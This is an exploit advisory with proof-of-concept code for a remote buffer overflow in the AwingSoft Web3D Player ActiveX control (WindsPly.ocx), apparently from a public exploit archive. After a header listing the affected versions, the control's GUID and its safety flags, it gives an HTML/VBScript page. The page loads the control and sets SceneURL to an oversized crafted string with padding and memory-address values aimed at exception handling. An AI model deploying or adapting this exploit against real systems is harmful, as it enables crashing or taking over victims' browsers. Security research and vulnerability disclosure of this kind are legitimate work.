-----------------------------------------------------------------------------
AwingSoft Web3D Player (WindsPly.ocx) "SceneURL()" Remote Buffer Overflow
url: http://www.awingsoft.com/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net/
Dedicated to aaannamariaaa :D
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
File: WindsPly.ocx
Ver.: <= 3.5.0.0
GUID: {17A54E7D-A9D4-11D8-9552-00E04CB09903}
ProgID: WindsPlayerIE.View.1
Marked as:
RegKey Safe for Script: Falso
RegKey Safe for Init: Falso
Implements IObjectSafety: Vero
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 8
-----------------------------------------------------------------------------
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903' id='test'></object>
<script language='vbscript'>
buff = String(8704, "A")
mReg = unescape("bbbb")
mExc = unescape("%00%00%01%00") 'Memory address: 00010000 Access: RW
buf1 = String(88, "c")
buf2 = String(47284, "D")
test.SceneURL = buff + mReg + mExc + buf1 + buf2
</script>